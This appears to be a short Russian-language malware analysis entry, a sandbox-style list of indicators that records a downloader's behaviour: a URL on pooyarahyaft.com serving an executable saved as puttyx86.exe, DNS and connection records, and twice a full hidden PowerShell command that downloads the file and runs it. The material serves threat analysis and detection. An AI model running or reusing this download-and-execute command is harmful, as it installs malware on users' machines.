Техническая информация
- http://pooyarahyaft.com/amana/af1ba8f.exe как %temp%\puttyx86.exe
- '<SYSTEM32>\cmd.exe' cmd.exe /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://pooyarahyaft.com/amana/AF1BA8F.exe','%TEMP%\puttyx86.exe') & %tmp%\puttyx86.exe
- 'po####ahyaft.com':80
- DNS ASK po####ahyaft.com
- '<SYSTEM32>\cmd.exe' cmd.exe /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://pooyarahyaft.com/amana/AF1BA8F.exe','%TEMP%\puttyx86.exe') & %tmp%\puttyx86.exe' (со скрытым окном)